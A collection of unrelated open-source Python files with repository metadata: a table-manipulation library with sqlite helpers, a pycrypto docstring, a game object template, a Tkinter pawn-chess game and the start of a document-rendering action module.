first_row = func(self[0])
# determine headers of new table
if headers is None:
# try order new headers the same way as old headers
headers = first_row.keys()
lookup = util.list2lookup(self.headers)
top = len(headers)
headers.sort(key=lambda x: (lookup.get(x, top), x))
tab = type(self)(
chain([first_row], (func(x) for x in self[1:])),
headers=headers)
tab.delim = self.delim
tab.nheaders = self.nheaders
return tab
def uniq(self, key=None, col=None):
"""
Returns a copy of this table with consecutive repeated rows removed
"""
tab = self.new()
if len(self) == 0:
return tab
if col is not None:
key = lambda x: x[col]
if key is None:
last_row = self[0]
for row in self[1:]:
if row != last_row:
tab.append(row)
last_row = row
else:
last_row = key(self[0])
for row in self[1:]:
key_row = key(row)
if key_row != last_row:
tab.append(row)
last_row = key_row
return tab
def groupby(self, key=None):
"""Groups the row of the table into separate tables based on the
function key(row). Returns a dict where the keys are the values
retruned from key(row) and the values are tables.
Ex:
tab = Table([{'name': 'matt', 'major': 'CS'},
{'name': 'mike', 'major': 'CS'},
{'name': 'alex', 'major': 'bio'}])
lookup = tab.groupby(lambda x: x['major'])
lookup ==> {'CS': Table([{'name': 'matt', 'major': 'CS'},
{'name': 'mike', 'major': 'CS'}]),
'bio': Table([{'name': 'alex', 'major': 'bio'}])}
Can also use a column name such as:
tab.groupby('major')
"""
groups = {}
if isinstance(key, str):
keystr = key
key = lambda x: x[keystr]
if key is None:
raise Exception("must specify keyfunc")
for row in self:
key2 = key(row)
# add new table if necessary
if key2 not in groups:
groups[key2] = self.new()
groups[key2].append(row)
return groups
def lookup(self, *keys, **options):
"""Returns a lookup dict based on a column 'key'
or multiple keys
extra options:
default=None
uselast=False # allow multiple rows, just use last
"""
options.setdefault("default", None)
options.setdefault("uselast", False)
lookup = util.Dict(dim=len(keys), default=options["default"])
uselast = options["uselast"]
for row in self:
keys2 = util.mget(row, keys)
ptr = lookup
for i in xrange(len(keys2) - 1):
ptr = lookup[keys2[i]]
if not uselast and keys2[-1] in ptr:
raise Exception("duplicate key '%s'" % str(keys2[-1]))
ptr[keys2[-1]] = row
lookup.insert = False
return lookup
def get(self, rows=None, cols=None):
"""Returns a table with a subset of the rows and columns"""
# determine rows and cols
if rows is None:
rows = range(len(self))
if cols is None:
cols = self.headers
tab = self.new(cols)
# copy data
for i in rows:
row = self[i]
row2 = {}
for j in cols:
row2[j] = row[j]
tab.append(row2)
return tab
def cget(self, *cols):
"""Returns columns of the table as separate lists"""
ret = []
for col in cols:
newcol = []
ret.append(newcol)
for row in self:
newcol.append(row[col])
if len(ret) == 1:
return ret[0]
else:
return ret
def get_row(self, *rows):
"""Returns row(s) as list(s)"""
if len(rows) == 1:
# return one row
row = self[rows[0]]
return [row[j] for j in self.headers]
else:
# return multiple rows (or zero)
return [[self[i][j] for j in self.headers]
for i in rows]
def sort(self, cmp=None, key=None, reverse=False, col=None):
"""Sorts the table inplace"""
if col is not None:
key = lambda row: row[col]
elif cmp is None and key is None:
# sort by first column
key = lambda row: row[self.headers[0]]
list.sort(self, cmp=cmp, key=key, reverse=reverse)
def __getitem__(self, key):
if isinstance(key, slice):
# return another table if key is a slice
tab = self.new()
tab[:] = list.__getitem__(self, key)
return tab
else:
return list.__getitem__(self, key)
def __getslice__(self, a, b):
# for python version compatibility
return self.__getitem__(slice(a, b))
def __repr__(self):
s = StringIO()
self.write_pretty(s)
return s.getvalue()
def write_pretty(self, out=sys.stdout, spacing=2):
    """Write the table to 'out' as human-readable, aligned columns.

    spacing: number of spaces separating columns.
    """
    mat2, rlabels, clabels = self.get_matrix(rowheader=None)
    mat = []
    # get headers
    mat.append(clabels)
    # get data
    mat.extend(mat2)
    # util.printcols performs the actual column alignment
    util.printcols(mat, spacing=spacing, out=out)
def __str__(self):
    """Serialize the table using its standard write() format."""
    buf = StringIO()
    self.write(buf)
    return buf.getvalue()
#===========================================================================
# Convenience functions
def read_table(filename, delim="\t", headers=None,
               nheaders=1, types=None,
               guess_types=True):
    """Read a Table from a file written in PTF"""
    tab = Table()
    tab.read(filename, delim=delim, headers=headers,
             nheaders=nheaders, types=types,
             guess_types=guess_types)
    return tab
def iter_table(filename, delim="\t", nheaders=1, types=None, guess_types=True):
    """Iterate through the rows of a Table from a file."""
    # a throwaway Table instance drives the streaming read
    return Table().read_iter(filename, delim=delim, nheaders=nheaders,
                             types=types, guess_types=guess_types)
def histtab(items, headers=None, item="item", count="count", percent="percent",
            cols=None):
    """Make a histogram table.

    items: iterable of hashable items, or a Table when 'cols' is given.
    headers: optional explicit headers for the result table.
    item/count/percent: column names used in the result table.
    cols: when given, 'items' is treated as a Table and histogrammed over
        tuples built from these columns.
    """
    if cols is not None:
        # items is a Table.
        items = items.as_tuples(cols=cols)
        if headers is None:
            headers = cols + [count, percent]
    if headers is None:
        headers = [item, count, percent]
    # NOTE(review): if percent is None, the default header lists above still
    # include it (as None) — presumably callers pass explicit headers in that
    # case; verify against callers.
    h = util.hist_dict(items)
    tab = Table(headers=headers)
    # total count, as float so the percent division below is non-integer (py2)
    tot = float(sum(h.itervalues()))
    # snapshot items once so the append loop and the percent loop below
    # iterate in the same order
    hist_items = h.items()
    if cols is not None:
        for key, val in hist_items:
            row = dict(zip(cols, key))
            row[count] = val
            tab.append(row)
    else:
        for key, val in hist_items:
            tab.append({item: key,
                        count: val})
    if percent is not None:
        # tab rows were appended in hist_items order, so index i matches
        for i, (key, val) in enumerate(hist_items):
            tab[i][percent] = val / tot
    # most frequent first
    tab.sort(col=count, reverse=True)
    return tab
def join_tables(*args, **kwargs):
    """Join together tables into one table.

    Each argument is a tuple (table_i, key_i, cols_i)

    key_i is either a column name or a function that maps a
    table row to a unique key

    Rows are matched on keys present in *every* table (an inner join);
    result rows appear in the key order of the first table.
    Optional kwargs: headers -- explicit header list for the result.
    """
    if len(args) == 0:
        return Table()
    # determine common keys
    tab, key, cols = args[0]
    if isinstance(key, str):
        keys = tab.cget(key)
        lookups = [tab.lookup(key)]
    else:
        # key is a function; build the key list and lookup dict by hand
        # (py2 map returns a list)
        keys = map(key, tab)
        lookup = {}
        for row in tab:
            lookup[key(row)] = row
        lookups = [lookup]
    keyset = set(keys)
    # intersect keys with every remaining table, collecting a lookup per table
    for tab, key, cols in args[1:]:
        if isinstance(key, str):
            keyset = keyset & set(tab.cget(key))
            lookups.append(tab.lookup(key))
        else:
            keyset = keyset & set(map(key, tab))
            lookup = {}
            for row in tab:
                lookup[key(row)] = row
            lookups.append(lookup)
    # keep the first table's key order (py2 filter returns a list)
    keys = filter(lambda x: x in keyset, keys)
    # build new table
    if "headers" not in kwargs:
        headers = util.concat(*util.cget(args, 2))
    else:
        headers = kwargs["headers"]
    tab = Table(headers=headers)
    for key in keys:
        row = {}
        # merge the selected columns from each table's matching row
        for (tab2, key2, cols), lookup in zip(args, lookups):
            row.update(util.subdict(lookup[key], cols))
        tab.append(row)
    return tab
def showtab(tab, name='table'):
    """Show a table in a new xterm.

    tab: the Table to display.
    name: window title (single quotes are stripped so the shell-quoted
        title below stays balanced).
    """
    name = name.replace("'", "")
    tmp = util.tempfile(".", "tmp", ".tab")
    # use open() instead of the py2-only file() builtin, and close the
    # handle explicitly so the file is fully flushed before xterm reads it
    out = open(tmp, "w")
    try:
        tab.write_pretty(out)
    finally:
        out.close()
    # view in a background xterm; the temp file is removed when less exits
    os.system("(xterm -T '%s' -n '%s' -e less -S %s; rm %s) &" %
              (name, name, tmp, tmp))
def sqlget(dbfile, query, maxrows=None, headers=None, headernum=False):
    """Get a table from a sqlite file.

    dbfile: sqlite filename, or an already-open DB-API connection
        (anything with a .cursor() method).
    query: SQL query to execute.
    maxrows: if given, fetch at most this many rows.
    headers: explicit column names; when None (and headernum is false)
        they are inferred from the cursor description.
    """
    # open database (reuse the connection if the caller passed one in)
    if hasattr(dbfile, "cursor"):
        con = dbfile
        cur = con.cursor()
        auto_close = False
    else:
        con = sqlite.connect(dbfile, isolation_level="DEFERRED")
        cur = con.cursor()
        auto_close = True
    cur.execute(query)
    # infer header names from the cursor description
    if headers is None and not headernum:
        headers = [x[0] for x in cur.description]
    if maxrows is not None:
        # DB-API fetchmany() returns at most maxrows rows, replacing the
        # py2-only cur.next()/StopIteration loop
        tab = Table(cur.fetchmany(maxrows), headers=headers)
    else:
        tab = Table(list(cur), headers=headers)
    if auto_close:
        con.close()
    return tab
def sqlexe(dbfile, sql):
    """Execute a single SQL statement against a sqlite file or connection."""
    # reuse an existing connection if one was passed in
    if hasattr(dbfile, "cursor"):
        con, auto_close = dbfile, False
    else:
        con = sqlite.connect(dbfile, isolation_level="DEFERRED")
        auto_close = True
    cur = con.cursor()
    cur.execute(sql)
    if auto_close:
        con.close()
def sql_create_table(cur, table_name, tab, overwrite=True):
    """Create an SQL table based on a Table 'tab'.

    cur: DB-API cursor used to execute the statements.
    table_name: name of the table to create.
    tab: Table whose .headers and .types define the columns.
    overwrite: drop any existing table of the same name first.
    """
    # py2/py3 string-type compatibility (basestring was removed in py3)
    try:
        string_types = basestring
    except NameError:
        string_types = str

    def issubclass2(t1, t2):
        # issubclass() that tolerates non-type entries in tab.types
        if type(t1) != type:
            return False
        return issubclass(t1, t2)
    # drop old table if needed
    if overwrite:
        cur.execute("DROP TABLE IF EXISTS %s;" % table_name)
    # build column declarations from the table's column types.
    # NOTE: bool must be tested before int because issubclass(bool, int)
    # is True in Python; with the previous ordering the BOOLEAN branch
    # was unreachable and bool columns were declared INTEGER.
    cols = []
    for header in tab.headers:
        t = tab.types[header]
        if issubclass2(t, string_types):
            cols.append("%s TEXT" % header)
        elif issubclass2(t, bool):
            cols.append("%s BOOLEAN" % header)
        elif issubclass2(t, int):
            cols.append("%s INTEGER" % header)
        elif issubclass2(t, float):
            cols.append("%s FLOAT" % header)
        else:
            # default is text
            cols.append("%s TEXT" % header)
    cols = ",".join(cols)
    # create table
    cur.execute("""CREATE TABLE %s (%s);""" % (table_name, cols))
def sqlput(dbfile, table_name, tab, overwrite=True, create=True):
    """Insert a table into a sqlite file.

    dbfile: sqlite filename, or an already-open DB-API connection.
    table_name: destination table name.
    tab: a Table instance, or a filename to stream rows from.
    overwrite: drop an existing table first (used when create is True).
    create: create the destination table from the Table's column types.
    """
    # open database (reuse an existing connection when given one)
    if hasattr(dbfile, "cursor"):
        con = dbfile
        cur = con.cursor()
        auto_close = False
    else:
        con = sqlite.connect(dbfile, isolation_level="DEFERRED")
        cur = con.cursor()
        auto_close = True
    # read table from file
    if not isinstance(tab, Table):
        filename = tab
        tab = Table()
        it = tab.read_iter(filename)
        try:
            # force a reading of the headers
            # (it.next() is the py2-only iterator protocol)
            row = it.next()
            # re-attach the consumed row in front of the remaining iterator;
            # 'chain' is expected to be itertools.chain imported earlier in
            # this module -- TODO confirm
            rows = chain([row], it)
        except StopIteration:
            rows = []
            pass
    else:
        rows = tab
    if create:
        sql_create_table(cur, table_name, tab, overwrite=overwrite)
    # determine text columns
    def issubclass2(t1, t2):
        # issubclass() that tolerates non-type entries in tab.types
        if type(t1) != type:
            return False
        return issubclass(t1, t2)
    text = set()
    for header in tab.headers:
        t = tab.types[header]
        # any non-numeric, non-bool column is quoted as text
        if issubclass2(t, basestring) or not (
            issubclass2(t, int) or
            issubclass2(t, float) or
            issubclass2(t, bool)):
            text.add(header)
    # insert rows
    # NOTE(review): values are interpolated straight into the SQL text and
    # text values get only naive '"%s"' quoting -- embedded quotes in the
    # data will break the statement (injection risk); parameterized INSERT
    # would be safer.
    for row in rows:
        vals = []
        for header in tab.headers:
            if header in text:
                vals.append('"%s"' % row[header])
            else:
                # calls the unbound __str__ of the column's type with the
                # value as its argument -- presumably the type objects in
                # tab.types format values this way; verify
                vals.append(tab.types[header].__str__(row[header]))
        vals = ",".join(vals)
        cur.execute("INSERT INTO %s VALUES (%s);" % (table_name, vals))
    con.commit()
    if auto_close:
        con.close()
#===========================================================================
# Matrix functions
def matrix2table(mat, rlabels=None, clabels=None, rowheader="rlabels"):
    """
    convert a matrix into a table
    use table.get_matrix() to convert back to a matrix
    """
    # default column labels are just 0..ncols-1 (and then no header row)
    if clabels is None:
        clabels = range(len(mat[0]))
        nheaders = 0
    else:
        nheaders = 1
    headers = clabels if rlabels is None else [rowheader] + clabels
    tab = Table(headers=headers)
    tab.nheaders = nheaders
    for i, row in enumerate(mat):
        # seed the row dict with the row label, if labels were supplied
        row2 = {} if rlabels is None else {rowheader: rlabels[i]}
        for j in range(len(row)):
            row2[clabels[j]] = row[j]
        tab.append(row2)
    return tab
def write_matrix(filename, mat, rlabels=None, clabels=None,
                 rowheader="rlabels"):
    """Write matrix 'mat' to 'filename' via an intermediate Table."""
    matrix2table(mat,
                 rlabels=rlabels,
                 clabels=clabels,
                 rowheader=rowheader).write(filename)
def read_matrix(filename, rowheader="rlabels"):
    """Read a matrix written by write_matrix().

    Returns (mat, rlabels, clabels).
    """
    return read_table(filename).get_matrix(rowheader=rowheader)
| {
"content_hash": "f6d0374ea355b332c379a29608889171",
"timestamp": "",
"source": "github",
"line_count": 1150,
"max_line_length": 89,
"avg_line_length": 27.74086956521739,
"alnum_prop": 0.5118174409127955,
"repo_name": "wutron/compbio",
"id": "b9aca5f81862f0a39205b2c16fed2c2253e311cb",
"size": "31902",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rasmus/tablelib.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "263"
},
{
"name": "Python",
"bytes": "1481466"
},
{
"name": "Shell",
"bytes": "592"
}
],
"symlink_target": ""
} |
"""Cryptographic protocols
Implements various cryptographic protocols. (Don't expect to find
network protocols here.)
Crypto.Protocol.KDF
A collection of standard key derivation functions.
Crypto.Protocol.SecretSharing
Distribute a secret amongst a group of participants.
"""
__all__ = ['KDF', 'SecretSharing']
| {
"content_hash": "f755c29fce9ce615177862a98b25c3eb",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 66,
"avg_line_length": 24.46153846153846,
"alnum_prop": 0.7767295597484277,
"repo_name": "marcuskelly/recover",
"id": "6a538ce31fc83ff427f84c9f9f230c729b2cfe04",
"size": "1831",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "Lib/site-packages/Crypto/Protocol/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1242"
},
{
"name": "C",
"bytes": "443857"
},
{
"name": "C++",
"bytes": "134770"
},
{
"name": "CSS",
"bytes": "21746"
},
{
"name": "HTML",
"bytes": "47112"
},
{
"name": "JavaScript",
"bytes": "29289"
},
{
"name": "Mako",
"bytes": "9381"
},
{
"name": "PowerShell",
"bytes": "8175"
},
{
"name": "Python",
"bytes": "16837827"
},
{
"name": "Shell",
"bytes": "2069"
},
{
"name": "Tcl",
"bytes": "1285363"
}
],
"symlink_target": ""
} |
# Print one pseudo-random integer from the inclusive range [0, 99].
import random

print(random.randint(0, 99))
| {
"content_hash": "6b565773b4923b109d7c762c8ffe953d",
"timestamp": "",
"source": "github",
"line_count": 3,
"max_line_length": 27,
"avg_line_length": 14.333333333333334,
"alnum_prop": 0.7674418604651163,
"repo_name": "WebClub-NITK/Hacktoberfest-2k17",
"id": "2af8a1b6074a1cfd3a560d92a3197b2656a1488c",
"size": "43",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "Hello_World/Hello-World-Python/pankaj.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "41"
},
{
"name": "C",
"bytes": "111323"
},
{
"name": "C#",
"bytes": "845"
},
{
"name": "C++",
"bytes": "25563"
},
{
"name": "CSS",
"bytes": "1069"
},
{
"name": "Go",
"bytes": "359"
},
{
"name": "HTML",
"bytes": "32484"
},
{
"name": "Java",
"bytes": "20074"
},
{
"name": "JavaScript",
"bytes": "2713"
},
{
"name": "Lua",
"bytes": "394"
},
{
"name": "PHP",
"bytes": "1042"
},
{
"name": "Pascal",
"bytes": "235"
},
{
"name": "Perl",
"bytes": "579"
},
{
"name": "Python",
"bytes": "32114"
},
{
"name": "Ruby",
"bytes": "60"
},
{
"name": "VHDL",
"bytes": "1542"
}
],
"symlink_target": ""
} |
from swgpy.object import *
def create(kernel):
    """Build the Tangible template for the falumpaset forest lair."""
    obj = Tangible()
    obj.template = "object/tangible/lair/falumpaset/shared_lair_falumpaset_forest.iff"
    obj.attribute_template_id = -1
    obj.stfName("lair_n","falumpaset_forest")

    #### BEGIN MODIFICATIONS ####
    #### END MODIFICATIONS ####

    return obj
"content_hash": "cf8d8efad0d33edbd7818b76c1854a20",
"timestamp": "",
"source": "github",
"line_count": 13,
"max_line_length": 86,
"avg_line_length": 24.692307692307693,
"alnum_prop": 0.7071651090342679,
"repo_name": "obi-two/Rebelion",
"id": "0a2ce3018e9d234032163e00458ec84756f15218",
"size": "466",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "data/scripts/templates/object/tangible/lair/falumpaset/shared_lair_falumpaset_forest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "11818"
},
{
"name": "C",
"bytes": "7699"
},
{
"name": "C++",
"bytes": "2293610"
},
{
"name": "CMake",
"bytes": "39727"
},
{
"name": "PLSQL",
"bytes": "42065"
},
{
"name": "Python",
"bytes": "7499185"
},
{
"name": "SQLPL",
"bytes": "41864"
}
],
"symlink_target": ""
} |
'''
Based on
Representing a chess set in Python
Part 2
Brendan Scott
https://python4kids.brendanscott.com/2013/04/28/a-different-view-on-our-chess-model/
'''
import Tkinter as tk
from Tkinter import PhotoImage
import os.path
import os
# column_reference = "1 2 3 4 5 6 7 8".split(" ")
column_reference = "a b c d e f g h".split(" ")
EMPTY_SQUARE = " "
TILE_WIDTH = 60
'''We have used a tile width of 60 because the images we are used are 60x60 pixels
The original svg files were obtained from
http://commons.wikimedia.org/wiki/Category:SVG_chess_pieces/Standard_transparent
after downloading they were batch converted to png, then gif files. Bash one liners
to do this:
for i in $(ls *.svg); do inkscape -e ${i%.svg}.png -w 60 -h 60 $i ; done
for i in $(ls *.png); do convert $i ${i%.png}.gif ; done
white and black tiles were created in inkscape
'''
BOARD_WIDTH = 8 * TILE_WIDTH
BOARD_HEIGHT = BOARD_WIDTH
DATA_DIR = "chess_data"
TILES = {"black_tile": "black_tile.gif",
"p": "chess_p45.gif",
"P": "chess_p451.gif",
"white_tile": "white_tile.gif"
}
class Model(object):
    # Board state for a pawns-only chess variant; rows are stored top-down
    # (screen order), not in chess rank order.
    def __init__(self):
        '''create a chess board with pieces positioned for a new game
        row ordering is reversed from normal chess representations
        but corresponds to a top left screen coordinate
        '''
        self.board = []
        pawn_base = "P " * 8
        white_pawns = pawn_base.strip()
        black_pawns = white_pawns.lower()
        # 8 rows total: empty, black pawns, 4 empty, white pawns, empty
        self.board.append([EMPTY_SQUARE] * 8)
        self.board.append(black_pawns.split(" "))
        for i in range(4):
            self.board.append([EMPTY_SQUARE] * 8)
        self.board.append(white_pawns.split(" "))
        self.board.append([EMPTY_SQUARE] * 8)

    def color(self, i, j):
        ''' checks the color of the piece located at the i, j coordinates
        returns 0 for white, 1 for black, -1 for an empty square
        '''
        color = -1  # 0 - white, 1 - black
        if self.board[i][j] == 'p':
            color = 1
        elif self.board[i][j] == 'P':
            color = 0
        return color

    def move(self, start, destination):
        ''' move a piece located at the start location to destination
        (each an instance of BoardLocation)
        Does not check whether the move is valid for the piece

        NOTE(review): only pawns ('p'/'P') exist on this board; there is no
        promotion or en-passant handling, and each failed check just prints
        an error and returns without moving.
        '''
        # check piece color
        color = self.color(start.i, start.j)
        print "Piece color: ", 'black' if color == 1 else ('white' if color == 0 else 'position empty')
        print "start.j, %d, destination.j %d" % (start.j, destination.j)
        print "start.i, %d, destination.i %d" % (start.i, destination.i)
        print "---"
        print self.board
        print "---"
        # ### error checking ### #
        # check coordinates are valid
        for c in [start, destination]:
            if c.i > 7 or c.j > 7 or c.i < 0 or c.j < 0:
                print 'err - coordinates are not valid (outside of board size)\n---'
                return
        # don't move to same location
        if start.i == destination.i and start.j == destination.j:
            print 'err - move to same location\n---'
            return
        # nothing to move
        if self.board[start.i][start.j] == EMPTY_SQUARE:
            print 'err - nothing to move\n---'
            return
        # don't move more than one step
        # if at initial location don't move more than two steps
        if color == 1 and start.i == 1 or color == 0 and start.i == 6:
            if abs(destination.i - start.i) > 2 or abs(destination.j - start.j) > 1:
                print 'err - more than two steps at init location\n---'
                return
        # don't move more than one step
        elif abs(destination.i - start.i) > 1 or abs(destination.j - start.j) > 1:
            print 'err - more than one step\n---'
            return
        # capture move
        capture_color = self.color(destination.i, destination.j)
        print 'capture color: ', capture_color
        print '---'
        # prevent capture of same color
        if capture_color == color and (start.j - 1 == destination.j or start.j + 1 == destination.j):
            print 'err - capture of same color\n---'
            return
        # prevent capture on an empty square
        if capture_color != color and (start.j - 1 == destination.j or start.j + 1 == destination.j) \
                and self.board[destination.i][destination.j] == EMPTY_SQUARE:
            print 'err - capture of empty square\n---'
            return
        # prevent capture on walk (vertical)
        if capture_color != color and capture_color != -1 and start.j == destination.j:
            print 'err - capture on walk\n---'
            return
        # no retreat # and start.j == destination.j
        # if start.i - 1 != destination.i and color == 0: #allows only one step
        if start.i < destination.i and color == 0:  # white goes up
            print 'err - retreat attempt\n---'
            return
        # if start.i + 1 != destination.i and color == 1: #allows only one step
        if start.i > destination.i and color == 1:  # black goes down
            print 'err - retreat attempt\n---'
            return
        # all checks passed: perform the move
        f = self.board[start.i][start.j]
        self.board[destination.i][destination.j] = f
        self.board[start.i][start.j] = EMPTY_SQUARE
        print '---\n'
class BoardLocation(object):
    """A simple (row, column) coordinate on the 8x8 board."""
    def __init__(self, i, j):
        self.i, self.j = i, j
class View(tk.Frame):
    # Tkinter view: draws the board tiles and pieces on a canvas.
    def __init__(self, parent=None):
        """Build the frame, load the tile/piece images and create the canvas."""
        tk.Frame.__init__(self, parent)
        # label = tk.Label(self, text="Error rate for a perceptron")
        # label.pack(pady=10, padx=10)
        label = tk.Button(self, text="Error ")
        label.pack(pady=10, padx=10, side = tk.RIGHT)
        self.canvas = tk.Canvas(self, width=BOARD_WIDTH, height=BOARD_HEIGHT)
        self.canvas.pack()
        self.images = {}
        for image_file_name in TILES:
            f = os.path.join(DATA_DIR, TILES[image_file_name])
            if not os.path.exists(f):
                print("Error: Cannot find image file: %s at %s - aborting" % (TILES[image_file_name], f))
                exit(-1)
            self.images[image_file_name] = PhotoImage(file=f)
        '''This opens each of the image files, converts the data into a form that Tkinter
        can use, then stores that converted form in the attribute self.images
        self.images is a dictionary, keyed by the letters we used in our model to
        represent the pieces - ie PRNBKQ for white and prnbkq for black
        eg self.images['N'] is a PhotoImage of a white knight
        this means we can directly translate a board entry from the model into a picture
        '''
        self.pack()

    def clear_canvas(self):
        ''' delete everything from the canvas'''
        items = self.canvas.find_all()
        for i in items:
            self.canvas.delete(i)

    def draw_row(self, y, first_tile_white=True, debug_board=False):
        ''' draw a single row of alternating black and white tiles,
        the colour of the first tile is determined by first_tile_white
        if debug_board is set show the coordinates of each of the tile corners
        '''
        if first_tile_white:
            remainder = 1
        else:
            remainder = 0
        for i in range(8):
            x = i * TILE_WIDTH
            if i % 2 == remainder:
                # i %2 is the remainder after dividing i by 2
                # so i%2 will always be either 0 (no remainder- even numbers) or
                # 1 (remainder 1 - odd numbers)
                # this tests whether the number i is even or odd
                tile = self.images['black_tile']
            else:
                tile = self.images['white_tile']
            self.canvas.create_image(x, y, anchor=tk.NW, image=tile)
            # NW is a constant in the Tkinter module. It stands for "north west"
            # that is, the top left corner of the picture is to be located at x,y
            # if we used another anchor, the grid would not line up properly with
            # the canvas size
            if debug_board:  # implicitly this means if debug_board == True.
                ''' If we are drawing a debug board, draw an arrow showing top left
                and its coordinates. '''
                text_pos = (x + TILE_WIDTH / 2, y + TILE_WIDTH / 2)
                line_end = (x + TILE_WIDTH / 4, y + TILE_WIDTH / 4)
                self.canvas.create_line((x, y), line_end, arrow=tk.FIRST)
                text_content = "(%s,%s)" % (x, y)
                self.canvas.create_text(text_pos, text=text_content)

    def draw_empty_board(self, debug_board=False):
        ''' draw an empty board on the canvas
        if debug_board is set show the coordinates of each of the tile corners'''
        y = 0
        for i in range(8):  # draw 8 rows
            y = i * TILE_WIDTH
            # each time, advance the y value at which the row is drawn
            # by the length of the tile
            first_tile_white = not (i % 2)
            self.draw_row(y, first_tile_white, debug_board)

    def draw_pieces(self, board):
        """Draw every piece in 'board' (the Model's 8x8 list of letters)."""
        for i, row in enumerate(board):
            # using enumerate we get an integer index
            # for each row which we can use to calculate y
            # because rows run down the screen, they correspond to the y axis
            # and the columns correspond to the x axis
            for j, piece in enumerate(row):
                if piece == EMPTY_SQUARE:
                    continue  # skip empty tiles
                tile = self.images[piece]
                x = j * TILE_WIDTH
                y = i * TILE_WIDTH
                self.canvas.create_image(x, y, anchor=tk.NW, image=tile)

    def display(self, board, debug_board=False):
        ''' draw an empty board then draw each of the
        pieces in the board over the top'''
        self.clear_canvas()
        self.draw_empty_board(debug_board=debug_board)
        if not debug_board:
            self.draw_pieces(board)
        # first draw the empty board
        # then draw the pieces
        # if the order was reversed, the board would be drawn over the pieces
        # so we couldn't see them

    def display_debug_board(self):
        """Show only the empty board with no pieces."""
        self.clear_canvas()
        self.draw_empty_board()
class Controller(object):
    # Glue between Model (board state) and View (Tkinter canvas).
    def __init__(self, parent=None, model=None):
        """Create (or adopt) a Model, build the View and wire up clicks."""
        if model is None:
            self.m = Model()
        else:
            self.m = model
        self.v = View(parent)
        ''' we have created both a model and a view within the controller
        the controller doesn't inherit from either model or view
        '''
        self.v.canvas.bind("<Button-1>", self.handle_click)
        # this binds the handle_click method to the view's canvas for left button down
        self.clickList = []
        # I have kept clickList here, and not in the model, because it is a record of what is happening
        # in the view (ie click events) rather than something that the model deals with (eg moves).

    def run(self, debug_mode=False):
        """Draw the initial board and enter the Tkinter main loop (blocks)."""
        self.update_display(debug_board=debug_mode)
        tk.mainloop()

    def handle_click(self, event):
        ''' Handle a click received.  The x,y location of the click on the canvas is at
        (event.x, event.y)
        First, we need to translate the event coordinates (ie the x,y of where the click occurred)
        into a position on the chess board
        add this to a list of clicked positions
        every first click is treated as a "from" and every second click as a "to"
        so, whenever there are an even number of clicks, use the most recent two to perform a move
        then update the display
        '''
        j = event.x / TILE_WIDTH
        # the / operator is called integer division
        # it returns the number of times TILE_WIDTH goes into event.x ignoring any remainder
        # eg: 2/2 = 1, 3/2 = 1, 11/5 = 2 and so on
        # so, it should return a number between 0 (if x < TILE_WIDTH) though to 7
        # NOTE(review): this relies on py2 integer division; under python 3
        # '/' would yield a float and these indices would need '//'
        i = event.y / TILE_WIDTH
        self.clickList.append(BoardLocation(i, j))
        # just maintain a list of all of the moves
        # this list shouldn't be used to replay a series of moves because that is something
        # which should be stored in the model - but it wouldn't be much trouble to
        # keep a record of moves in the model.
        if len(self.clickList) % 2 == 0:
            # move complete, execute the move
            self.m.move(self.clickList[-2], self.clickList[-1])
            # use the second last entry in the clickList and the last entry in the clickList
            self.update_display()

    def update_display(self, debug_board=False):
        """Redraw the view from the model's current board state."""
        self.v.display(self.m.board, debug_board=debug_board)

    def parse_move(self, move):
        ''' Very basic move parsing
        given a move in the form ab-cd where a and c are in [a,b,c,d,e,f,g,h]
        and b and d are numbers from 1 to 8 convert into BoardLocation instances
        for start (ab) and destination (cd)
        Does not deal with castling (ie 0-0 or 0-0-0) or bare pawn moves (e4)
        or capture d4xe5 etc
        No error checking! very fragile
        '''
        s, d = move.split("-")
        i = 8 - int(s[-1])  # board is "upside down" with reference to the representation
        j = column_reference.index(s[0])
        start = BoardLocation(i, j)
        i = 8 - int(d[-1])
        j = column_reference.index(d[0])
        destination = BoardLocation(i, j)
        return start, destination
if __name__ == "__main__":
if not os.path.exists(DATA_DIR):
''' basic check - if there are files missing from the data directory, the
program will still fail '''
dl = raw_input("Cannot find chess images directory. Download from website? (Y/n)")
if dl.lower() == "n":
print("No image files found, quitting.")
exit(0)
print("Creating directory: %s" % os.path.join(os.getcwd(), DATA_DIR))
import urllib
os.mkdir(DATA_DIR)
url_format = "https://python4kids.files.wordpress.com/2013/04/%s"
for k, v in TILES.items():
url = url_format % v
target_filename = os.path.join(DATA_DIR, v)
print("Downloading file: %s" % v)
urllib.urlretrieve(url, target_filename)
parent = tk.Tk()
c = Controller(parent)
c.run(debug_mode=False) | {
"content_hash": "05a2ca464874cb9deecdc8ac81d72ab8",
"timestamp": "",
"source": "github",
"line_count": 368,
"max_line_length": 105,
"avg_line_length": 39.42934782608695,
"alnum_prop": 0.5809097174362509,
"repo_name": "xR86/ml-stuff",
"id": "df4ef9e2a50596a036499e2b8cfe901bd8c701a3",
"size": "14528",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "labs-AI/hw-lab5/pawn_chess.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "2131"
},
{
"name": "Dockerfile",
"bytes": "49"
},
{
"name": "Jupyter Notebook",
"bytes": "84710241"
},
{
"name": "Makefile",
"bytes": "634"
},
{
"name": "Python",
"bytes": "128637"
},
{
"name": "Shell",
"bytes": "550"
},
{
"name": "TeX",
"bytes": "14991"
}
],
"symlink_target": ""
} |
"""
Documint action factories.
Each public function produces a `dict` suitable for passing to the
`perform_action` session method.
"""
def _action(name, params):
"""
Convenience function for constructing an action `dict`.
"""
return {u'action': name,
u'parameters': params}
def render_html(input, base_uri=None):
    """
    Render an HTML document to a PDF document.

    :param unicode input: URI to the HTML content to render.
    :param base_uri: Optional base URI to use when resolving relative URIs.
    :type base_uri: unicode or None
    """
    params = {u'input': input}
    if base_uri is not None:
        params[u'base-uri'] = base_uri

    def _parse_render(result):
        # the rendered document URI is the first "result" link
        return result[u'links'][u'result'][0]
    return {u'action': u'render-html',
